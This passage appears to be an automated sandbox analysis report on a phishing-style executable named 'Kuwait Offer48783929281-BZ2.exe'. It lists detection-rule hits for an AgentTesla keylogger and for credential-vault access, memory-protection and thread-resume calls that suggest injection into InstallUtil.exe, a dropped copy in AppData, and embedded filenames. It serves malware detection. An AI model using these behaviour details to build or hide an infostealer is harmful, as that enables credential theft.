                    Source: 2.2.InstallUtil.exe.600000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 2.2.InstallUtil.exe.600000.0.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                    Source: 0.2.Kuwait Offer48783929281-BZ2.exe.40d00c8.3.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 0.2.Kuwait Offer48783929281-BZ2.exe.40d00c8.3.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                    Source: 3.2.Hxfzsthbd.exe.3600ce8.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 3.2.Hxfzsthbd.exe.3600ce8.5.raw.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                    Source: 0.2.Kuwait Offer48783929281-BZ2.exe.40d00c8.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 0.2.Kuwait Offer48783929281-BZ2.exe.40d00c8.3.raw.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                    Source: 0.2.Kuwait Offer48783929281-BZ2.exe.4069550.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 0.2.Kuwait Offer48783929281-BZ2.exe.4069550.1.raw.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                    Source: Kuwait Offer48783929281-BZ2.exe, License.csLong String: Length: 10317
                    Source: Hxfzsthbd.exe.0.dr, License.csLong String: Length: 10317
                    Source: 0.2.Kuwait Offer48783929281-BZ2.exe.431d1f8.6.raw.unpack, License.csLong String: Length: 10317
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exeCode function: 0_2_0634D5E8 NtProtectVirtualMemory,0_2_0634D5E8
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exeCode function: 0_2_0634EA90 NtResumeThread,0_2_0634EA90
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exeCode function: 0_2_0634D5E0 NtProtectVirtualMemory,0_2_0634D5E0
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exeCode function: 0_2_0634EA88 NtResumeThread,0_2_0634EA88
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeCode function: 3_2_0579D5E8 NtProtectVirtualMemory,3_2_0579D5E8
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeCode function: 3_2_0579EA90 NtResumeThread,3_2_0579EA90
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeCode function: 3_2_0579D5E0 NtProtectVirtualMemory,3_2_0579D5E0
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeCode function: 3_2_0579EA88 NtResumeThread,3_2_0579EA88
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeCode function: 8_2_05CBD5E8 NtProtectVirtualMemory,8_2_05CBD5E8
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeCode function: 8_2_05CBEA90 NtResumeThread,8_2_05CBEA90
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeCode function: 8_2_05CBD5E0 NtProtectVirtualMemory,8_2_05CBD5E0
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeCode function: 8_2_05CBEA88 NtResumeThread,8_2_05CBEA88
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exeCode function: 0_2_013C20370_2_013C2037
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exeCode function: 0_2_013C20600_2_013C2060
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exeCode function: 0_2_013C26A80_2_013C26A8
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exeCode function: 0_2_013C26980_2_013C2698
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exeCode function: 0_2_062E77B00_2_062E77B0
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exeCode function: 0_2_062E51200_2_062E5120
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exeCode function: 0_2_062E8BAC0_2_062E8BAC
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exeCode function: 0_2_062E17680_2_062E1768
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exeCode function: 0_2_062E17590_2_062E1759
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exeCode function: 0_2_062ED52E0_2_062ED52E
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exeCode function: 0_2_062ED5300_2_062ED530
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exeCode function: 0_2_062E51110_2_062E5111
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exeCode function: 0_2_062EBCE80_2_062EBCE8
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exeCode function: 0_2_062EBCD90_2_062EBCD9
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exeCode function: 0_2_06345E700_2_06345E70
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exeCode function: 0_2_0634C6C00_2_0634C6C0
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exeCode function: 0_2_0634D3700_2_0634D370
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exeCode function: 0_2_0634A3A80_2_0634A3A8
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exeCode function: 0_2_063400400_2_06340040
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exeCode function: 0_2_06345E610_2_06345E61
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exeCode function: 0_2_0634C6B00_2_0634C6B0
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exeCode function: 0_2_063473700_2_06347370
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exeCode function: 0_2_0634D3600_2_0634D360
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exeCode function: 0_2_0634A3980_2_0634A398
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exeCode function: 0_2_063473800_2_06347380
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exeCode function: 0_2_0634B0580_2_0634B058
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exeCode function: 0_2_0634B0470_2_0634B047
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exeCode function: 0_2_063471040_2_06347104
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exeCode function: 0_2_0635C7880_2_0635C788
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exeCode function: 0_2_063534A00_2_063534A0
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exeCode function: 0_2_063531E00_2_063531E0
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exeCode function: 0_2_0635CDBF0_2_0635CDBF
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exeCode function: 0_2_063528180_2_06352818
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exeCode function: 0_2_0635C77A0_2_0635C77A
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exeCode function: 0_2_0635D2700_2_0635D270
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exeCode function: 0_2_0635D2620_2_0635D262
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exeCode function: 0_2_063520300_2_06352030
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exeCode function: 0_2_063520200_2_06352020
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exeCode function: 0_2_06352AB60_2_06352AB6
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exeCode function: 0_2_06352A9E0_2_06352A9E
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exeCode function: 0_2_063528080_2_06352808
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exeCode function: 0_2_063539800_2_06353980
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exeCode function: 0_2_066211400_2_06621140
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exeCode function: 0_2_066282710_2_06628271
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exeCode function: 0_2_066282800_2_06628280
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exeCode function: 0_2_0662214F0_2_0662214F
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exeCode function: 0_2_0662B9580_2_0662B958
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exeCode function: 0_2_066211300_2_06621130
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exeCode function: 0_2_066221A00_2_066221A0
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exeCode function: 0_2_066300400_2_06630040
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exeCode function: 0_2_066316480_2_06631648
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exeCode function: 0_2_06634A680_2_06634A68
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exeCode function: 0_2_066303670_2_06630367
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exeCode function: 0_2_067BCD280_2_067BCD28
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_008893F82_2_008893F8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_00884A602_2_00884A60
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_00889C702_2_00889C70
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_00883E482_2_00883E48
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0088CF282_2_0088CF28
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_008841902_2_00884190
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_052CDC082_2_052CDC08
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_052CBCC82_2_052CBCC8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_052C8B682_2_052C8B68
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_052C9AA02_2_052C9AA0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_052C56B02_2_052C56B0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_052C00402_2_052C0040
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_052C32302_2_052C3230
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_052C3F282_2_052C3F28
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_052C4FD02_2_052C4FD0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_052C2AE82_2_052C2AE8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_00889C682_2_00889C68
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeCode function: 3_2_00AF20373_2_00AF2037
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeCode function: 3_2_00AF20603_2_00AF2060
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeCode function: 3_2_00AF26A83_2_00AF26A8
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeCode function: 3_2_057377B03_2_057377B0
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeCode function: 3_2_057351203_2_05735120
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeCode function: 3_2_05738BAC3_2_05738BAC
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeCode function: 3_2_0573D5303_2_0573D530
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeCode function: 3_2_0573D5233_2_0573D523
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeCode function: 3_2_057317683_2_05731768
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeCode function: 3_2_057317593_2_05731759
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeCode function: 3_2_057351113_2_05735111
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeCode function: 3_2_0573BCE83_2_0573BCE8
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeCode function: 3_2_0573BCD93_2_0573BCD9
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeCode function: 3_2_05795E703_2_05795E70
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeCode function: 3_2_0579C6C03_2_0579C6C0
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeCode function: 3_2_057900403_2_05790040
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeCode function: 3_2_0579D3703_2_0579D370
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeCode function: 3_2_0579A3A83_2_0579A3A8
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeCode function: 3_2_05795E613_2_05795E61
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeCode function: 3_2_0579C6B03_2_0579C6B0
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeCode function: 3_2_0579B0583_2_0579B058
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeCode function: 3_2_0579B0473_2_0579B047
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeCode function: 3_2_057973703_2_05797370
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeCode function: 3_2_0579D3603_2_0579D360
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeCode function: 3_2_0579A3983_2_0579A398
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeCode function: 3_2_057973803_2_05797380
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeCode function: 3_2_057A34A03_2_057A34A0
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeCode function: 3_2_057AC7883_2_057AC788
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeCode function: 3_2_057AD2703_2_057AD270
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeCode function: 3_2_057A28183_2_057A2818
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeCode function: 3_2_057AC77B3_2_057AC77B
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeCode function: 3_2_057A20303_2_057A2030
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeCode function: 3_2_057A20203_2_057A2020
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeCode function: 3_2_057AD2633_2_057AD263
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeCode function: 3_2_057ACDBF3_2_057ACDBF
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeCode function: 3_2_057A39803_2_057A3980
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeCode function: 3_2_057A28083_2_057A2808
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeCode function: 3_2_057A2AB63_2_057A2AB6
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeCode function: 3_2_057A2A9E3_2_057A2A9E
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeCode function: 3_2_05A711403_2_05A71140
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeCode function: 3_2_05A721A03_2_05A721A0
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeCode function: 3_2_05A711303_2_05A71130
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeCode function: 3_2_05A7A9403_2_05A7A940
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeCode function: 3_2_05A7214F3_2_05A7214F
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeCode function: 3_2_05A7A9503_2_05A7A950
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeCode function: 3_2_05A800403_2_05A80040
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeCode function: 3_2_05A83A903_2_05A83A90
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeCode function: 3_2_05A816483_2_05A81648
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeCode function: 3_2_05A803673_2_05A80367
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeCode function: 3_2_05C0CD283_2_05C0CD28
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_00C44A604_2_00C44A60
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_00C49C684_2_00C49C68
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_00C43E484_2_00C43E48
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_00C4CF284_2_00C4CF28
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_00C441904_2_00C44190
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeCode function: 8_2_010320378_2_01032037
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeCode function: 8_2_010320608_2_01032060
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeCode function: 8_2_010326988_2_01032698
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeCode function: 8_2_010326A88_2_010326A8
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeCode function: 8_2_05C577B08_2_05C577B0
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeCode function: 8_2_05C58BAC8_2_05C58BAC
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeCode function: 8_2_05C5D5238_2_05C5D523
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeCode function: 8_2_05C5D5308_2_05C5D530
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeCode function: 8_2_05C517598_2_05C51759
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeCode function: 8_2_05C517688_2_05C51768
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeCode function: 8_2_05C551208_2_05C55120
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeCode function: 8_2_05C5BCD98_2_05C5BCD9
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeCode function: 8_2_05C5BCE88_2_05C5BCE8
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeCode function: 8_2_05CBC6C08_2_05CBC6C0
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeCode function: 8_2_05CB5E708_2_05CB5E70
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeCode function: 8_2_05CB00408_2_05CB0040
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeCode function: 8_2_05CBA3A88_2_05CBA3A8
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeCode function: 8_2_05CBD3708_2_05CBD370
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeCode function: 8_2_05CBC6B08_2_05CBC6B0
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeCode function: 8_2_05CB5E618_2_05CB5E61
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeCode function: 8_2_05CBB0478_2_05CBB047
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeCode function: 8_2_05CBB0588_2_05CBB058
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeCode function: 8_2_05CB73808_2_05CB7380
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeCode function: 8_2_05CBA3988_2_05CBA398
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeCode function: 8_2_05CBD3608_2_05CBD360
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeCode function: 8_2_05CB73708_2_05CB7370
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeCode function: 8_2_05CC34A08_2_05CC34A0
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeCode function: 8_2_05CCC7888_2_05CCC788
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeCode function: 8_2_05CCCDC18_2_05CCCDC1
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeCode function: 8_2_05CC28188_2_05CC2818
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeCode function: 8_2_05CCC77A8_2_05CCC77A
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeCode function: 8_2_05CC20208_2_05CC2020
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeCode function: 8_2_05CC20308_2_05CC2030
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeCode function: 8_2_05CCD2628_2_05CCD262
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeCode function: 8_2_05CCD2708_2_05CCD270
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeCode function: 8_2_05CC39808_2_05CC3980
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeCode function: 8_2_05CC280F8_2_05CC280F
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeCode function: 8_2_05CC2A9E8_2_05CC2A9E
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeCode function: 8_2_05CC2AB68_2_05CC2AB6
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeCode function: 8_2_05F911408_2_05F91140
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeCode function: 8_2_05F921A08_2_05F921A0
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeCode function: 8_2_05F9A9508_2_05F9A950
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeCode function: 8_2_05F9214F8_2_05F9214F
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeCode function: 8_2_05F9A9408_2_05F9A940
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeCode function: 8_2_05F911318_2_05F91131
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeCode function: 8_2_05F9E0968_2_05F9E096
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeCode function: 8_2_05FA00408_2_05FA0040
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeCode function: 8_2_05FA16488_2_05FA1648
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeCode function: 8_2_05FA03678_2_05FA0367
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeCode function: 8_2_0612CD288_2_0612CD28
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 9_2_011393F89_2_011393F8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 9_2_01134A609_2_01134A60
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 9_2_01139C709_2_01139C70
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 9_2_0113CF289_2_0113CF28
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 9_2_01133E489_2_01133E48
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 9_2_011341909_2_01134190
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 9_2_061056A89_2_061056A8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 9_2_061000409_2_06100040
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 9_2_06102EE89_2_06102EE8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 9_2_06103F209_2_06103F20
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 9_2_0610DC009_2_0610DC00
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 9_2_0610BCC09_2_0610BCC0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 9_2_06108B609_2_06108B60
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 9_2_061036309_2_06103630
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 9_2_06104FC89_2_06104FC8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 9_2_01139C689_2_01139C68
                    Source: Kuwait Offer48783929281-BZ2.exe, 00000000.00000002.1348809721.00000000030A7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs Kuwait Offer48783929281-BZ2.exe
                    Source: Kuwait Offer48783929281-BZ2.exe, 00000000.00000002.1348809721.00000000030A7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs Kuwait Offer48783929281-BZ2.exe
                    Source: Kuwait Offer48783929281-BZ2.exe, 00000000.00000002.1357567810.0000000004175000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs Kuwait Offer48783929281-BZ2.exe
                    Source: Kuwait Offer48783929281-BZ2.exe, 00000000.00000002.1366854084.00000000066B0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs Kuwait Offer48783929281-BZ2.exe
                    Source: Kuwait Offer48783929281-BZ2.exe, 00000000.00000002.1365742147.0000000006360000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs Kuwait Offer48783929281-BZ2.exe
                    Source: Kuwait Offer48783929281-BZ2.exe, 00000000.00000002.1348809721.000000000321B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename7dfcfdf2-d881-49c9-a39e-708aca656f85.exe4 vs Kuwait Offer48783929281-BZ2.exe
                    Source: Kuwait Offer48783929281-BZ2.exe, 00000000.00000002.1357567810.0000000004220000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameScjghq.dll" vs Kuwait Offer48783929281-BZ2.exe
                    Source: Kuwait Offer48783929281-BZ2.exe, 00000000.00000002.1357567810.0000000004220000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameDwdxhtcoji.exe6 vs Kuwait Offer48783929281-BZ2.exe
                    Source: Kuwait Offer48783929281-BZ2.exe, 00000000.00000002.1348001830.00000000013DE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Kuwait Offer48783929281-BZ2.exe
                    Source: Kuwait Offer48783929281-BZ2.exe, 00000000.00000002.1364855917.00000000061C0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameScjghq.dll" vs Kuwait Offer48783929281-BZ2.exe
                    Source: Kuwait Offer48783929281-BZ2.exe, 00000000.00000000.1317218194.0000000000C82000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameDwdxhtcoji.exe6 vs Kuwait Offer48783929281-BZ2.exe
                    Source: Kuwait Offer48783929281-BZ2.exe, 00000000.00000002.1357567810.0000000004069000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename7dfcfdf2-d881-49c9-a39e-708aca656f85.exe4 vs Kuwait Offer48783929281-BZ2.exe
                    Source: Kuwait Offer48783929281-BZ2.exe, 00000000.00000002.1357567810.0000000004069000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs Kuwait Offer48783929281-BZ2.exe
                    Source: Kuwait Offer48783929281-BZ2.exeBinary or memory string: OriginalFilenameDwdxhtcoji.exe6 vs Kuwait Offer48783929281-BZ2.exe
                    Source: Kuwait Offer48783929281-BZ2.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
